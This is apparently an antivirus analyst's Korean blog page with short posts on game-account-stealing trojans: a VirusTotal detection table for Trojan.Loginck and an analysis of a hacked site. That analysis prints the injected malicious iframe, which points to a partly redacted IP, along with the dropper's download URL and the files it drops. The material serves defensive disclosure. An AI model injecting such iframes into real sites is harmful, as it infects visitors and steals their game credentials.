태터데스크 관리자

도움말
닫기
적용하기   첫페이지 만들기

태터데스크 메시지

저장하였습니다.

보안관련소식2010.06.03 10:13


아이디 4천 400만개 노출
유명 온라인 게임 계정정보 4천 400만개 노출
신속히 암호를 변경하세요.
www.zdnet.co.kr

시만텍의 악성코드 이름으로 Trojan.Loginck 라는 트로이목마가 이슈가 되고 있습니다.

현재 nProtect Anti-Virus 제품에서는 Trojan/W32.Agent.28160.LF 라는 진단명으로 진단/치료하고 있습니다.
주로 사용하는 암호는 정기적으로 복잡하게 변경하시면 외부의 잠재적 위협을 예방하는데 많은 도움이 될 수 있습니다.

바이러스 토탈 진단현황
nProtect Anti-Virus 진단 치료 가능
www.virustotal.com

a-squared 5.0.0.26 2010.06.02 Trojan.Msil!IK
AhnLab-V3 2010.06.02.00 2010.06.01 Win-Trojan/Loginck.28160
AntiVir 8.2.2.4 2010.06.02 TR/MSIL.Small.H
Antiy-AVL 2.0.3.7 2010.06.02 Trojan/MSIL.Small.gen
Authentium 5.2.0.5 2010.06.02 -
Avast 4.8.1351.0 2010.06.02 Win32:Malware-gen
Avast5 5.0.332.0 2010.06.02 Win32:Malware-gen
AVG 9.0.0.787 2010.06.02 Generic17.BYIM
BitDefender 7.2 2010.06.02 Trojan.Generic.3915841
CAT-QuickHeal 10.00 2010.06.02 Trojan.Agent.gen
ClamAV 0.96.0.3-git 2010.06.02 -
Comodo 4980 2010.06.01 TrojWare.MSIL.Small
DrWeb 5.0.2.03300 2010.06.02 -
eSafe 7.0.17.0 2010.06.01 -
eTrust-Vet 35.2.7524 2010.06.02 -
F-Prot 4.6.0.103 2010.06.02 -
F-Secure 9.0.15370.0 2010.06.02 Trojan.Generic.3915841
Fortinet 4.1.133.0 2010.06.01 W32/Small.H!tr
GData 21 2010.06.02 Trojan.Generic.3915841
Ikarus T3.1.1.84.0 2010.06.02 Trojan.Msil
Jiangmin 13.0.900 2010.06.02 -
Kaspersky 7.0.0.125 2010.06.02 Trojan.MSIL.Small.h
McAfee 5.400.0.1158 2010.06.02 Generic PWS.y!cpq
McAfee-GW-Edition 2010.1 2010.06.02 Generic PWS.y!cpq
Microsoft 1.5802 2010.06.02 PWS:Win32/OnLineGames
NOD32 5165 2010.06.02 MSIL/Loginck.A
Norman 6.04.12 2010.06.01 -
nProtect 2010-06-02.01 2010.06.02 Trojan/W32.Agent.28160.LF
Panda 10.0.2.7 2010.06.01 W32/Aliser.C
PCTools 7.0.3.5 2010.06.02 Trojan.Loginck
Prevx 3.0 2010.06.02 -
Rising 22.50.02.04 2010.06.02 -
Sophos 4.53.0 2010.06.02 -
Sunbelt 6390 2010.06.02 Trojan.Win32.Generic!BT
Symantec 20101.1.0.89 2010.06.02 Trojan.Loginck
TheHacker 6.5.2.0.291 2010.06.01 Trojan/Small.h
TrendMicro 9.120.0.1004 2010.06.02 TROJ_GEN.UAE201Z
TrendMicro-HouseCall 9.120.0.1004 2010.06.02 TROJ_GEN.UAE201Z
VBA32 3.12.12.5 2010.06.01 Trojan.MSIL.Small.h
ViRobot 2010.6.1.2333 2010.06.01 MSIL.S.Small.28160
VirusBuster 5.0.27.0 2010.06.01 Trojan.PWS.OnLineGames.BVDT

사용자 삽입 이미지

Posted by viruslab

댓글을 달아 주세요

  1. 진단명을 보니 마이크로소프트사의 파일로 위장을 했었나 봅니다?

    2010.06.03 12:37 신고 [ ADDR : EDIT/ DEL : REPLY ]
    • 혹시 MSIL 말씀하시는건가요?
      이건 Microsoft Intermediate Language 를 뜻하는것으로 아래 내용참고해 보세요.

      MS 위장방식은 아니구요^^

      http://blog.naver.com/kueck?Redirect=Log&logNo=10019262556

      2010.06.03 12:52 신고 [ ADDR : EDIT/ DEL ]
    • 아~ 그런 뜻이었군요.^^

      2010.06.03 13:10 신고 [ ADDR : EDIT/ DEL ]

인터넷세상2009.08.25 08:46


엔씨소프트의 아이온이 독일 쾰른에서 개최된 유럽 최대 게임 전시회인 GamesCom 에 아이온(AION)을 공개하여 큰 관심을 받았다고 합니다.

아이온의 인기 증가만큼 사용자들의 계정 도용을 위한 악성코드 유포도 증가추세로 보여집니다.

사용자 삽입 이미지

사용자 삽입 이미지


Posted by viruslab

댓글을 달아 주세요

신종악성코드정보2009.05.23 14:51


메인 페이지에 악의적인 아이프레임이 삽입되어 있다.

<iframe src=http://203.(생략).117/index.htm width=100 height=0></iframe></a>
   

index.htm 파일에는 Multiple Exploit Code 가 포함되어 있다.


일부 PC에서는 다음과 같은 오류창이 나타날 수 있다.


- old.js
- flash.htm
- IE7.htm
- 06014.htm
- real.htm
- new1.htm
- ac.htm

Exploit Code 들에 의해서 중국사이트에 숨겨져 있는 svchost.exe 파일이 설치시도 된다.

http://down.(생략).org/svchost.exe

svchost.exe 파일이 실행되면 다음과 같은 파일이 생성된다.

C:\Windows\System32\korean.dll
C:\Windows\System32\msdconf.exe

korean.dll 파일은 다음과 같은 온라인 게임의 주요 모듈 사용자의 정보 탈취를 시도한다.

MAPLESTORY.EXE
DNF.EXE
GAMELAUNCHER.EXE



Posted by viruslab

댓글을 달아 주세요